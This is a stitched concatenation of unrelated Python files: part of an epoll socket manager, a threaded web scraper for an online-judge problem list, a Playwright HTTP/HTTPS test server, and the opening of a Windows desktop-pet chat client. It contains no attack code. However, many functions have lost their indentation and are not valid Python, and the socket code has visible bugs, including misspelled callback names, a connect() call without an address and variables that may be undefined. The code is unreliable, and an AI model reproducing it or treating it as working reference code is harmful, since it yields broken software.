        logger.info('RM SOCKET EXIT')
        self.recv_thread_finish = True
        for socket_fileno in self.socket_fileno_info.keys():
            self.socket_fileno_info[socket_fileno]['socket'].close()
        self.socket_fileno_info = {}
        self.user_fd_to_socket_fd = {}
        # Wait for __epoll_task to observe recv_thread_finish and return.
        self.recv_thread.join()
def close(self, user_fd):
logger.info('SHUWDOWN %d' % (user_fd))
if user_fd in self.user_fd_to_socket_fd.keys():
self.__remove_socket_fileno_info(self.user_fd_to_socket_fd[user_fd])
def create(self, mode, ip_port, server=True, recv_msgq_size=16, send_msgq_size=16, **callback):
if mode == RmSocket.TCP_MODE:
if server:
return self.__create_tcp_server(ip_port, recv_msgq_size=recv_msgq_size, send_msgq_size=send_msgq_size,
**callback)
else:
return self.__create_tcp_client(ip_port, recv_msgq_size=recv_msgq_size, send_msgq_size=send_msgq_size,
**callback)
elif mode == RmSocket.UDP_MODE:
if server:
return self.__create_udp_server(ip_port, recv_msgq_size=recv_msgq_size, send_msgq_size=send_msgq_size,
**callback)
else:
return self.__create_udp_client(ip_port, recv_msgq_size=recv_msgq_size, send_msgq_size=send_msgq_size,
**callback)
else:
return None
    # send msg directly until send_buff overflow, and put the msg to msgq
    # return value same as read on success
    # return None on error
    def send(self, user_fd, msg, ip_port=None):
        """Send `msg` on the socket mapped to `user_fd`.

        For UDP, `ip_port` (or the configured default target) picks the
        destination. Returns the byte count from send/sendto on success;
        returns None (implicitly) on error or unknown user_fd.
        """
        try:
            msg = str(msg)
            if user_fd in self.user_fd_to_socket_fd.keys():
                fileno = self.user_fd_to_socket_fd[user_fd]
                attr = self.socket_fileno_info[fileno]
                # TCP: only non-listening (client/accepted) sockets can send.
                if attr['type'] == self.TCP_MODE and attr['server_flag'] != True:
                    return attr['socket'].send(msg.encode('utf-8'))
                elif attr['type'] == self.UDP_MODE:
                    if ip_port:
                        return attr['socket'].sendto(msg.encode('utf-8'), ip_port)
                    elif 'default_target_addr' in attr.keys() and attr['default_target_addr']:
                        ip_port = attr['default_target_addr']
                        return attr['socket'].sendto(msg.encode('utf-8'), ip_port)
                    else:
                        logger.error('no target ip and port, cur msg is %s' % (msg.encode('utf-8')))
                        return None
        except socket.error as e:
            # Non-blocking socket buffer full: queue the message for later.
            # (`attr` is always bound here, since socket.error can only come
            # from the send/sendto calls above.)
            if e.errno == errno.EAGAIN:
                if not attr['send_msgq'].full():
                    attr['send_msgq'].put((msg, ip_port))
            else:
                logger.fatal(traceback.format_exc())
        except Exception as e:
            logger.fatal(traceback.format_exc())
# get msg data from msg_queue
# the msg recv from socket will be putted into msg_queue if there is no recv_callback
def recv(self, user_fd):
if user_fd in self.user_fd_to_socket_fd.keys():
fileno = self.user_fd_to_socket_fd[user_fd]
msg_queue = self.socket_fileno_info[fileno]['recv_msgq']
if not msg_queue.empty():
msg = msg_queue.get()
return msg
else:
return None
    def get_status(self):
        # Placeholder: status reporting is not implemented.
        pass
def get_local_host_ip(self, user_fd=None):
if user_fd in self.user_fd_to_socket_fd.keys():
socket = self.socket_fileno_info[self.user_fd_to_socket_fd[user_fd]]['socket']
try:
return socket.getsockname()[0]
except Exception as e:
logger.error(traceback.format_exc())
return None
else:
ifconfig_pipe = subprocess.Popen(['busybox', 'ifconfig', 'wlan0'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
)
ifconfig_info, error = ifconfig_pipe.communicate()
ifconfig_pipe.kill()
if len(error) != 0:
# get wlan0 error
return None
ifconfig_info = ifconfig_info.decode('utf-8')
inet_addr_str = ifconfig_info.split('\n')[1]
local_host_ip = None
if 'inet addr' in inet_addr_str:
local_host_ip = inet_addr_str.split(':')[1].split(' ')[0]
return local_host_ip
def get_remote_host_ip(self, user_fd):
if user_fd in self.user_fd_to_socket_fd.keys():
socket = self.socket_fileno_info[self.user_fd_to_socket_fd[user_fd]]['socket']
try:
return socket.getpeername()[0]
except Exception as e:
logger.error(traceback.format_exc())
else:
return None
    def set_udp_default_target_addr(self, user_fd, ip_port):
        """Remember a default (ip, port) destination for UDP sends on `user_fd`.

        The '<broadcast>' pseudo-address enables SO_BROADCAST/SO_REUSEADDR
        before storing the target; send() falls back to this address when no
        explicit ip_port is passed.
        """
        if user_fd in self.user_fd_to_socket_fd.keys():
            fileno = self.user_fd_to_socket_fd[user_fd]
            if ip_port[0] == '<broadcast>':
                self.socket_fileno_info[fileno]['socket'].setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
                self.socket_fileno_info[fileno]['socket'].setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
            self.socket_fileno_info[fileno]['default_target_addr'] = ip_port
def update_socket_info(self, user_fd, recv_msgq_size=None, send_msgq_size=None, connected_callback=None,
disconnected_callback=None, recv_callback=None, send_callback=None):
if user_fd in self.user_fd_to_socket_fd.keys():
fileno = self.user_fd_to_socket_fd[user_fd]
if recv_msgq_size:
self.socket_fileno_info[fileno]['recv_msgq'] = queue.Queue(recv_msgq_size)
if send_msgq_size:
self.socket_fileno_info[fileno]['send_msgq'] = queue.Queue(send_msgq_size)
if connected_callback and callable(connecti_calback):
self.socket_fileno_info[fileno]['callback']['connected_callback'] = connected_callback
if disconnected_callback and callable(disconnected_calback):
self.socket_fileno_info[fileno]['callback']['disconnected_callback'] = disconnected_callback
if recv_callback and callable(recv_callback):
self.socket_fileno_info[fileno]['callback']['recv_callback'] = recv_callback
if send_callback and callable(send_callback):
self.socket_fileno_info[fileno]['callback']['send_callback'] = send_callback
    def __add_socket_fileno_info(self, fd, type, server=False, recv_msgq_size=1, send_msgq_size=1, **callback):
        """Register socket `fd` with epoll and record its bookkeeping.

        Allocates a new user fd, switches the socket to non-blocking,
        registers it edge-triggered for read events, and stores its
        type/queues/callbacks. Returns the new user fd.
        """
        # update fd
        self.user_fd += 1
        fd_t = self.user_fd
        # mapping custom fd and real fd
        self.user_fd_to_socket_fd[self.user_fd] = fd.fileno()
        # Non-blocking + edge-triggered read events for the epoll loop.
        fd.setblocking(False)
        self.epoll_obj.register(fd.fileno(), select.EPOLLIN | select.EPOLLET)
        self.socket_fileno_info[fd.fileno()] = {
            'socket': fd,
            'user_fd': self.user_fd,
            'type': type,
            'server_flag': server,
            'callback': None,  # replaced with the filtered dict below
            'recv_msgq': queue.Queue(recv_msgq_size),
            'send_msgq': queue.Queue(send_msgq_size)
        }
        # Keep only callbacks that are present and actually callable.
        callback_dict = {}
        if 'connected_callback' in callback.keys() and callable(callback['connected_callback']):
            callback_dict['connected_callback'] = callback['connected_callback']
        if 'disconnected_callback' in callback.keys() and callable(callback['disconnected_callback']):
            callback_dict['disconnected_callback'] = callback['disconnected_callback']
        if 'recv_callback' in callback.keys() and callable(callback['recv_callback']):
            callback_dict['recv_callback'] = callback['recv_callback']
        if 'send_callback' in callback.keys() and callable(callback['send_callback']):
            callback_dict['send_callback'] = callback['send_callback']
        self.socket_fileno_info[fd.fileno()]['callback'] = callback_dict
        logger.info('NEW SOCKET %s' % fd)
        return fd_t
    def __remove_socket_fileno_info(self, fileno):
        """Close the socket for `fileno` and drop both bookkeeping entries."""
        if fileno in self.socket_fileno_info.keys():
            # NOTE(review): local name shadows the socket module (harmless
            # here since the module is not used below, but fragile).
            socket = self.socket_fileno_info[fileno]['socket']
            socket.close()
            if self.socket_fileno_info[fileno]['user_fd'] in self.user_fd_to_socket_fd.keys():
                self.user_fd_to_socket_fd.pop(self.socket_fileno_info[fileno]['user_fd'])
            self.socket_fileno_info.pop(fileno)
    def __create_tcp_server(self, ip_port, recv_msgq_size, send_msgq_size, **callback):
        """Create, register and listen() a TCP server socket.

        Returns the new user fd, or None on error.
        NOTE(review): epoll registration (and setblocking(False)) happens in
        __add_socket_fileno_info *before* listen() — confirm no event can be
        missed in between.
        """
        try:
            fd = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            fd.bind(ip_port)
            fd_t = self.__add_socket_fileno_info(fd, self.TCP_MODE, server=True, recv_msgq_size=recv_msgq_size,
                                                 send_msgq_size=send_msgq_size, **callback)
            fd.listen()
            return fd_t
        except Exception as e:
            logger.fatal(traceback.format_exc())
            return None
def __create_tcp_client(self, ip_port, recv_msgq_size, send_msgq_size, **callback):
try:
fd = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
fd.bind(ip_port)
fd_t = self.__add_socket_fileno_info(fd, self.TCP_MODE, server=False, recv_msgq_size=recv_msgq_size,
send_msgq_size=send_msgq_size, **callback)
fd.connect()
return fd_t
except Exception as e:
logger.fatal(traceback.format_exc())
return None
def __create_udp_server(self, ip_port, recv_msgq_size, send_msgq_size, **callback):
try:
fd = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
fd.bind(ip_port)
fd_t = self.__add_socket_fileno_info(fd, self.UDP_MODE, server=True, recv_msgq_size=recv_msgq_size,
send_msgq_size=send_msgq_size, **callback)
return fd_t
except Exception as e:
logger.fatal(traceback.format_exc())
return fd
def __create_udp_client(self, ip_port, recv_msgq_size, send_msgq_size, **callback):
try:
fd = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
fd_t = self.__add_socket_fileno_info(fd, self.UDP_MODE, server=False, recv_msgq_size=recv_msgq_size,
send_msgq_size=send_msgq_size, **callback)
return fd_t
except Exception as e:
logger.fatal(traceback.format_exc())
return fd
    def __register_connected_cb(self):
        # Placeholder: per-socket callback registration is not implemented.
        pass

    def __register_disconnected_cb(self):
        # Placeholder: not implemented.
        pass

    def __register_recv_cb(self):
        # Placeholder: not implemented.
        pass

    def __register_send_cb(self):
        # Placeholder: not implemented.
        pass
def __epoll_task(self):
timeout = -1
while not self.recv_thread_finish:
events = self.epoll_obj.poll(timeout)
if not events:
continue
for fd_fileno, event in events:
cur_socket_info = self.socket_fileno_info[fd_fileno]
# tcp
if cur_socket_info['type'] == self.TCP_MODE:
# check if new connection or not
if cur_socket_info['server_flag'] == True:
# ET mode, loop accept until raise exception
while True:
try:
conn, addr = cur_socket_info['socket'].accept()
fd_t = self.__add_socket_fileno_info(conn, self.TCP_MODE, server=False,
**self.socket_fileno_info[fd_fileno]['callback'])
if 'connected_callback' in self.socket_fileno_info[fd_fileno]['callback'].keys():
# connected callback (conn_addr, new_user_fd)
self.socket_fileno_info[fd_fileno]['callback']['connected_callback'](
self.socket_fileno_info[fd_fileno]['user_fd'], fd_t)
logger.info('NEW CONNECTION %s %s' % (conn, addr))
except socket.error as e:
if e.errno == errno.EAGAIN:
logger.info("NO NEW CONNECTION ALSO")
else:
logger.fatal(traceback.format_exc())
break
except Exception as e:
logger.fatal(traceback.format_exc())
break
else:
if event & select.EPOLLHUP:
if 'disconnected_callback' in self.socket_fileno_info[fd_fileno]['callback'].keys():
self.socket_fileno_info[fd_fileno]['callback']['disconnected_callback'](
self.socket_fileno_info[fd_fileno]['user_fd'])
self.__remove_socket_fileno_info(fd_fileno)
self.epoll_obj.unregister(fd_fileno)
# Read available
elif event & select.EPOLLIN:
buff = b''
# loop read until raise exception
while True:
try:
recv_buff = cur_socket_info['socket'].recv(2048)
buff += recv_buff
# connection disconnected
if not recv_buff:
logger.info('connection disconnected')
if 'disconnected_callback' in self.socket_fileno_info[fd_fileno][
'callback'].keys():
self.socket_fileno_info[fd_fileno]['callback']['disconnected_callback'](
self.socket_fileno_info[fd_fileno]['user_fd'])
self.__remove_socket_fileno_info(fd_fileno)
self.epoll_obj.unregister(fd_fileno)
break
except socket.error as e:
if e.errno == errno.EAGAIN:
logger.info('READ DATA EAGAIN ERROR')
else:
logger.fatal(traceback.format_exc())
break
except Exception as e:
logger.fatal(traceback.format_exc())
break
if recv_buff:
if 'recv_callback' in cur_socket_info['callback'].keys():
# recv callback (user_fd, msg)
cur_socket_info['callback']['recv_callback'](cur_socket_info['user_fd'],
recv_buff.decode('utf-8'))
else:
# put data in msg_queue if no recv_callback
if cur_socket_info['recv_msgq'].full():
cur_socket_info['recv_msgq'].get()
cur_socket_info['recv_msgq'].put((addr, recv_buff.decode('utf-8')))
# Write available
elif event & select.EPOLLOUT:
send_info = None
while self.socket_fileno_info[fd_fileno]['send_msgq'].qsize() > 0:
send_info = self.socket_fileno_info[fd_fileno]['send_msgq'].get()
if send_info == None:
continue
if 'send_callback' in cur_socket_info['callback'].keys():
# send callback (user_fd, msg)
cur_socket_info['callback']['send_callback'](cur_socket_info['user_fd'],
send_info[0])
try:
cur_socket_info['socket'].send(send_info[0].encode('utf-8'))
except Exception as e:
logger.fatal(traceback.format_exc())
# send error, reput the msg to msgq
# lost the msgq if the queue full
if not self.socket_fileno_info[fd_fileno]['send_msgq'].full():
self.socket_fileno_info[fd_fileno]['send_msgq'].put(send_info)
break
# set fd status to read
self.epoll_obj.modify(fd_fileno, select.EPOLLIN)
else:
# reset fd status
self.epoll_obj.modify(fd_fileno, 0)
# udp
elif cur_socket_info['type'] == self.UDP_MODE:
if event & select.EPOLLOUT:
send_info = None
while self.socket_fileno_info[fd_fileno]['send_msgq'].qsize() > 0:
send_info = self.socket_fileno_info[fd_fileno]['send_msgq'].get()
if send_info == None:
continue
ip_port = send_info[1]
if ip_port == None and 'default_target_addr' in cur_socket_info.keys():
ip_port = cur_socket_info['default_target_addr']
if 'send_callback' in cur_socket_info['callback'].keys():
# send callback (user_fd, msg)
cur_socket_info['callback']['send_callback'](cur_socket_info['user_id'], send_info[0])
try:
cur_socket_info['socket'].sendto(send_info[0].encode('utf-8'), ip_port)
except Exception as e:
if e.errno == errno.EAGAIN:
logger.info('WRITE DATA EAGAIN ERROR')
else:
logger.fatal(traceback.format_exc())
# send error, reput the msg to msgq
# lost the msgq if the queue full
if not self.socket_fileno_info[fd_fileno]['send_msgq'].full():
self.socket_fileno_info[fd_fileno]['send_msgq'].put(send_info)
break
# set fd status to read
self.epoll_obj.modify(fd_fileno, select.EPOLLIN)
elif event & select.EPOLLIN:
buff = b''
while True:
try:
recv_buff, addr = cur_socket_info['socket'].recvfrom(2048)
buff += recv_buff
except socket.error as e:
if e.errno == errno.EAGAIN:
logger.info('RECV DATA EAGAIN ERROR')
else:
logger.fatal(traceback.format_exc())
break
except Exception as e:
logger.fatal(traceback.format_exc())
break
if buff:
if 'recv_callback' in cur_socket_info['callback'].keys():
# recv callback (recv_addr, user_fd, msg)
cur_socket_info['callback']['recv_callback'](addr, cur_socket_info['user_fd'],
buff.decode('utf-8'))
else:
# remove oldest data if the msg_queue full
if cur_socket_info['recv_msgq'].full():
cur_socket_info['recv_msgq'].get()
cur_socket_info['recv_msgq'].put((addr, recv_buff.decode('utf-8')))
else:
# reset fd status
self.epoll_obj.modify(fd_fileno, 0)
else:
logger.info('KNOW SOCKET %s' % (cur_socket_info))
logger.info('exit')
|
main.py | from os import path
import requests
import os
import re
import threading
import time
# Work relative to the directory containing this script.
root = os.path.dirname(__file__)
index = []  # raw HTML of each problem-list page
plist = []  # problem ids parsed out of the list pages
os.chdir(root)
# Helper functions (functions are a good thing)
def write(file: str, text: str):
    """
    Overwrite *file* (relative to the script directory) with *text*, UTF-8.

    Uses a context manager so the handle is closed even if the write raises
    (the old open/close pair leaked the handle on error).
    """
    with open(os.path.join(root, file), "w", encoding="utf-8") as f:
        f.write(text)
def read(file: str):
    """
    Return the UTF-8 text content of *file* (relative to the script directory).

    Uses a context manager so the handle is closed even if reading raises.
    """
    with open(os.path.join(root, file), "r", encoding="utf-8") as f:
        return f.read()
def getpage(url: str):
    """
    Download one page and return its body decoded as UTF-8 text.
    """
    response = requests.get(url)
    response.encoding = 'utf-8'
    return response.text
def getindex():
    """
    Fill the global *index* with the HTML of all 25 problem-list pages.

    On first run the pages are downloaded and cached under ``index/``;
    if the cache directory already exists, the cached copies are re-read
    instead of hitting the network.
    """
    try:
        os.mkdir("index")
        for i in range(1, 26):
            x = getpage(f"http://go.helloworldroom.com:50080/problems?page={i}")
            index.append(x)
            # os.path.join instead of a hard-coded backslash: the old
            # f"index\i{i}.html" relied on the invalid '\i' escape sequence
            # and only worked on Windows.
            write(os.path.join("index", f"i{i}.html"), x)
    except FileExistsError:
        # Cache already present: load every cached page.
        for name in os.listdir("index"):
            index.append(read(os.path.join("index", name)))
def getplist():
    """
    Parse the cached list pages in *index* and append every referenced
    problem id (as a string) to the global *plist*.
    """
    digits_pattern = re.compile(r"\d+")
    link_pattern = re.compile(r"/problem/\d+")
    for page_html in index:
        for link in link_pattern.findall(page_html):
            plist.extend(digits_pattern.findall(link))
def getall():
    """
    Download every problem page listed in *plist* into ``problems/``,
    keeping at most ~30 downloader threads alive at a time.
    """
    os.mkdir("problems")
    def getone(n):
        # One worker: fetch problem *n* and cache it on disk.
        text = getpage(f"http://go.helloworldroom.com:50080/problem/{n}")
        # os.path.join instead of the invalid '\p' escape in the old path.
        write(os.path.join("problems", f"p{n}.html"), text)
    i = 0
    try:
        while True:
            if len(threading.enumerate()) <= 30:
                threading.Thread(target=getone, args=(plist[i],)).start()
                i += 1
                print(i, end="\r")
            else:
                # Yield the CPU instead of busy-spinning while the pool is full.
                time.sleep(0.01)
    except IndexError:
        # plist exhausted: every download has been dispatched.
        pass
def main():
    """
    Entry point: fetch the problem-list pages, parse out the problem ids,
    then download every individual problem page.
    """
    print("爬取页面列表...")
    getindex()
    print("完成")
    print("解析中...")
    getplist()
    print(f"共解析到{len(plist)}个题目,开始爬取!")
    getall()
    print("完成!")
    # Brief pause so worker threads' final progress output is visible.
    time.sleep(1)
# 面函数
main() |
server.py | # Copyright (c) Microsoft Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import abc
import asyncio
import gzip
import mimetypes
import socket
import threading
from contextlib import closing
from http import HTTPStatus
from OpenSSL import crypto
from twisted.internet import reactor, ssl
from twisted.web import http
from playwright.path_utils import get_file_dirname
_dirname = get_file_dirname()
def _find_free_port():
with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as s:
s.bind(("", 0))
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
return s.getsockname()[1]
class Server:
    """
    Twisted-backed test web server.

    Serves static files from the ``assets`` directory plus per-test dynamic
    routes, basic-auth requirements, CSP headers and gzip responses.
    Subclasses decide how to listen (plain TCP or SSL).
    """
    protocol = "http"
    def __init__(self):
        # Pick a free port and precompute the URL prefixes tests request.
        self.PORT = _find_free_port()
        self.EMPTY_PAGE = f"{self.protocol}://localhost:{self.PORT}/empty.html"
        self.PREFIX = f"{self.protocol}://localhost:{self.PORT}"
        self.CROSS_PROCESS_PREFIX = f"{self.protocol}://127.0.0.1:{self.PORT}"
        # On Windows, this list can be empty, reporting text/plain for scripts.
        mimetypes.add_type("text/html", ".html")
        mimetypes.add_type("text/css", ".css")
        mimetypes.add_type("application/javascript", ".js")
        mimetypes.add_type("image/png", ".png")
        mimetypes.add_type("font/woff2", ".woff2")
    def __repr__(self) -> str:
        return self.PREFIX
    @abc.abstractmethod
    def listen(self, factory):
        """Bind *factory* to self.PORT; implemented by subclasses."""
        pass
    def start(self):
        """Reset per-test state and start serving requests."""
        request_subscribers = {}
        auth = {}
        csp = {}
        routes = {}
        gzip_routes = set()
        self.request_subscribers = request_subscribers
        self.auth = auth
        self.csp = csp
        self.routes = routes
        self.gzip_routes = gzip_routes
        static_path = _dirname / "assets"
        class TestServerHTTPHandler(http.Request):
            def process(self):
                """Handle one request: auth check, dynamic route, or static file."""
                request = self
                self.post_body = request.content.read().decode()
                request.content.seek(0, 0)
                uri = request.uri.decode()
                # Wake up any test awaiting wait_for_request(uri).
                if request_subscribers.get(uri):
                    request_subscribers[uri].set_result(request)
                    request_subscribers.pop(uri)
                if auth.get(uri):
                    authorization_header = request.requestHeaders.getRawHeaders(
                        "authorization"
                    )
                    creds_correct = False
                    if authorization_header:
                        creds_correct = auth.get(uri) == (
                            request.getUser(),
                            request.getPassword(),
                        )
                    if not creds_correct:
                        request.setHeader(
                            b"www-authenticate", 'Basic realm="Secure Area"'
                        )
                        request.setResponseCode(HTTPStatus.UNAUTHORIZED)
                        request.finish()
                        return
                if csp.get(uri):
                    request.setHeader(b"Content-Security-Policy", csp[uri])
                # Dynamic routes take precedence over static assets.
                if routes.get(uri):
                    routes[uri](request)
                    return
                file_content = None
                try:
                    file_content = (
                        static_path / request.path.decode()[1:]
                    ).read_bytes()
                except (FileNotFoundError, IsADirectoryError):
                    request.setResponseCode(HTTPStatus.NOT_FOUND)
                if file_content:
                    request.setHeader("Content-Type", mimetypes.guess_type(uri)[0])
                    if uri in gzip_routes:
                        request.setHeader("Content-Encoding", "gzip")
                        request.write(gzip.compress(file_content))
                    else:
                        request.write(file_content)
                    self.setResponseCode(HTTPStatus.OK)
                self.finish()
        class MyHttp(http.HTTPChannel):
            requestFactory = TestServerHTTPHandler
        class MyHttpFactory(http.HTTPFactory):
            protocol = MyHttp
        self.listen(MyHttpFactory())
    async def wait_for_request(self, path):
        """Await and return the next request object received for *path*."""
        if path in self.request_subscribers:
            return await self.request_subscribers[path]
        future = asyncio.Future()
        self.request_subscribers[path] = future
        return await future
    def set_auth(self, path: str, username: str, password: str):
        """Require HTTP basic auth with these credentials for *path*."""
        self.auth[path] = (username, password)
    def set_csp(self, path: str, value: str):
        """Serve *path* with the given Content-Security-Policy header."""
        self.csp[path] = value
    def reset(self):
        """Drop all per-test routes, auth, CSP and gzip configuration."""
        self.request_subscribers.clear()
        self.auth.clear()
        self.csp.clear()
        self.gzip_routes.clear()
        self.routes.clear()
    def set_route(self, path, callback):
        """Serve *path* via *callback*(request) instead of a static file."""
        self.routes[path] = callback
    def enable_gzip(self, path):
        """Serve *path* gzip-compressed."""
        self.gzip_routes.add(path)
    def set_redirect(self, from_, to):
        """Respond to *from_* with a 302 redirect to *to*."""
        def handle_redirect(request):
            request.setResponseCode(HTTPStatus.FOUND)
            request.setHeader("location", to)
            request.finish()
        self.set_route(from_, handle_redirect)
class HTTPServer(Server):
    """Plain-HTTP variant: listens on a normal TCP socket."""
    def listen(self, factory):
        reactor.listenTCP(self.PORT, factory)
class HTTPSServer(Server):
    """HTTPS variant: listens over SSL with the bundled self-signed cert."""
    protocol = "https"
    def listen(self, factory):
        # Load the test certificate/key pair shipped under testserver/.
        cert = ssl.PrivateCertificate.fromCertificateAndKeyPair(
            ssl.Certificate.loadPEM(
                (_dirname / "testserver" / "cert.pem").read_bytes()
            ),
            ssl.KeyPair.load(
                (_dirname / "testserver" / "key.pem").read_bytes(), crypto.FILETYPE_PEM
            ),
        )
        contextFactory = cert.options()
        reactor.listenSSL(self.PORT, factory, contextFactory)
class TestServer:
    """Bundles the HTTP and HTTPS test servers behind one start/stop/reset API."""
    def __init__(self) -> None:
        self.server = HTTPServer()
        self.https_server = HTTPSServer()
    def start(self) -> None:
        """Start both servers and run the twisted reactor in a background thread."""
        self.server.start()
        self.https_server.start()
        # installSignalHandlers=0: the reactor runs outside the main thread.
        self.thread = threading.Thread(
            target=lambda: reactor.run(installSignalHandlers=0)
        )
        self.thread.start()
    def stop(self) -> None:
        """Stop the reactor and wait for its thread to exit."""
        reactor.stop()
        self.thread.join()
    def reset(self) -> None:
        """Clear per-test configuration on both servers."""
        self.server.reset()
        self.https_server.reset()
test_server = TestServer()
|
image_window.pyw | # example1.py
import os
from synchronizationRole import updataIfNeed
import zipfile
import struct
import win32api
import win32con
import win32gui
import threading
import Image
import time
import socket
import online_check as oc
import tkinter as tk
import message_transaction as mt
import tkinter.messagebox as tkmb
from WM_APP_MESSAGES import *
from win32api import RGB
import queue
from tkinter import Entry
import myPacket as mp
import elfAutoBehavior
import mailHandle
from winsound import PlaySound, SND_ASYNC
from random import randint
config_file="config"    # persisted user settings (readCheck / myCharFile / autoBehave)
history_file="history"  # per-friend chat history file name (under data/<id>/)
# Executed once at import: register the Win32 window class used by every
# image_window instance.
className = "image_window"
wc = win32gui.WNDCLASS()
wc.style = win32con.CS_HREDRAW | win32con.CS_VREDRAW
wc.lpfnWndProc = win32gui.DefWindowProc
wc.cbWndExtra = 0
wc.hCursor = win32gui.LoadCursor(0, win32con.IDC_ARROW)
wc.hbrBackground = win32con.COLOR_WINDOW + 1
wc.hIcon = win32gui.LoadIcon(0, win32con.IDI_APPLICATION)
wc.lpszClassName = className
wc.cbWndExtra = win32con.DLGWINDOWEXTRA +struct.calcsize("Pi")
# wc.hIconSm = 0
win32gui.RegisterClass(wc)
def getXY(lparam):
    """Unpack a Win32 LPARAM into its (x, y) 16-bit halves."""
    x = lparam & 0xffff
    y = (lparam >> 16) & 0xffff
    return x, y
def turnOffTk(tk_object):
    """Destroy the given Tk widget/window."""
    tk_object.destroy()
'''def getCharacter(fileName):
charFile = open(fileName, 'r')
charData=[]
for line in charFile.readlines():
charData.append(line.split())
charFile.close()
return charData'''
def getCharacter(fileName):
    """
    Parse a character (skin) description file.

    Each non-empty line is a list of whitespace-separated fields; the first
    field is a bitmap file name, rewritten to '<dir of fileName>/<name>'.
    Returns the list of field lists.
    """
    # Hoisted out of the loop: the base directory never changes per line.
    base_dir = os.path.abspath(os.path.join(fileName, os.pardir))
    charData = []
    # 'with' guarantees the handle is closed even if parsing raises
    # (the old open/close pair leaked it on error).
    with open(fileName, 'r') as charFile:
        for line in charFile.readlines():
            temp = line.split()
            if not temp:
                # Skip blank lines instead of crashing on temp[0].
                continue
            temp[0] = base_dir + '/' + temp[0]
            charData.append(temp)
    return charData
class image_window:
'''
modify .message_map to handle messages
init is the constructor
stuck in run() and released after closed
SetImages() to set a list of paths
SwitchNextImage() let you switch to next image
TODO
sending message
allowing multiline message
preview anime
'''
    def __init__(self, after_window_close, friend_name, sock, ip, characterFile, id):
        '''
        Create the desktop-pet chat window for one friend.

        after_window_close: callback invoked with self when the window closes
        friend_name: display name of the chat partner
        sock: an already-connected socket; maybe None, indicates the window
              is not connected currently (connection happens lazily on send)
        ip: the friend's address, used when connecting lazily
        characterFile: path of the character (skin) description file
        id: friend id, used for per-friend history storage
        '''
        win32gui.InitCommonControls()
        self.hinst = win32api.GetModuleHandle(None)
        '''for show action easy to draw'''
        self.image_index = 0
        '''for show action easy to draw'''
        self.friendID = id
        self.Image_list = []
        # Window-message dispatch table installed via SetWindowLong below.
        self.message_map = {
            win32con.WM_DESTROY: self.OnDestroy,
            win32con.WM_LBUTTONDOWN: self.OnLButtonDown,
            win32con.WM_LBUTTONUP: self.OnLButtonUp,
            win32con.WM_MOVE: self.OnMove,
            win32con.WM_SIZE:self.OnSize,
            win32con.WM_MOUSEMOVE: self.OnMouseMove,
            win32con.WM_PAINT: self.OnPaint,
            win32con.WM_RBUTTONUP: self.OnRButtonUp,
            WM_CHATMSGRECV: self.OnChatMessageReceived,
        }
        '''create the window '''
        self.BuildWindow("image_window")
        '''set the message mapping '''
        win32gui.SetWindowLong(self.hwnd, win32con.GWL_WNDPROC, self.message_map)
        '''read the configurations from file'''
        try:
            # Defaults used when the config file is missing or incomplete.
            self.readCheck=False
            self.autoBehave = False
            self.myCharFile = 'data/character1/character1.txt'
            self.ReadConfig()
        except Exception:
            print('no config file')
        '''whether chatter is online'''
        self.online = False
        '''whether the drag action is showing'''
        self.drag_showing = False
        '''whether character is being dragged'''
        self.dragging = False
        '''history'''
        self.this_messages=[]
        '''for display'''
        self.chat_name = friend_name
        ''''speak window'''
        self.speak_window = None
        '''speak window'''
        self.speak_window_hwnd = 0
        '''name window'''
        self.name_win = None
        self.ShowNameWin()
        self.history_window_width = 30 # in character
        '''callback function to be execute in ondestroy'''
        self.after = after_window_close
        '''for socket connection'''
        self.ip = ip
        '''the socket , whether connected or not'''
        self.conn_socket = None
        '''the character file (path of bitmaps)'''
        self.charFile = characterFile
        '''the chat msg queue for thread to insert into
        and for main thread to get from'''
        self.chatmsg_queue = queue.Queue()
        '''the chat msg window showing'''
        self.chat_msg_win = []
        '''offline Message string'''
        self.cht_str_msg = ''
        '''the sent msg window showing'''
        self.sent_msg_win = None
        print('the path input image_window get: ',self.getActionPath('idle.txt'))
        self.showAction(self.getActionPath('idle.txt'), True)
        '''for read cheack'''
        self.actionNow = None
        # Background thread that plays random idle animations.
        actionList = self.getAutoBehaviorActions()
        self.elfAutoBehaviorThread = elfAutoBehavior.ElfAutoBehavior(self, actionList)
        self.elfAutoBehaviorThread.setDaemon(True)
        self.elfAutoBehaviorThread.start()
        self.receive_message_read = True #no not yet read received message
        self.sended_message_read = True #he/she already read message
        if sock != None:
            self.setConnectedSocket(sock)
        '''for selecting the anime to send'''
        self.tmp_anime=""
def getAutoBehaviorActions(self):
path = self.getParentDirectory(self.charFile) + '/skeleton/'
anime_list = [f for f in os.listdir(path) if os.path.splitext(f)[1]=='.txt']
with open(path+'autoBehave.config') as file:
accept_list = [line[:-1] for line in file]
result_list = ['walk.txt']
for anime in anime_list:
if accept_list.count(anime) > 0:
result_list.append(anime)
return result_list
def setConnectedSocket(self, sock, is_connectee=True):
print('set connected socket', sock.getpeername())
if self.conn_socket != None:
try:
mt.SendChatEndMessage(self.conn_socket)
except:pass
self.conn_socket.close()
self.conn_socket = sock
# raise Exception('set socket when connected')
self.conn_socket = sock
if is_connectee:
mp.sendPacket(self.conn_socket, b'ok')
else:
assert mp.recvPacket(self.conn_socket) == b'ok'
self.DoAfterConnectEstablished()
def DoAfterConnectEstablished(self):
thread = threading.Thread(target=self.listen_to_chat_messagesInThread)
thread.setDaemon(True)
thread.start()
def ReadConfig(self):
with open(config_file) as file:
for line in file:
if line[-1] == '\n':
line = line[:-1]
cap = line.split(":")
if cap[0] == 'readCheck':
self.readCheck=bool(cap[1]=='True')
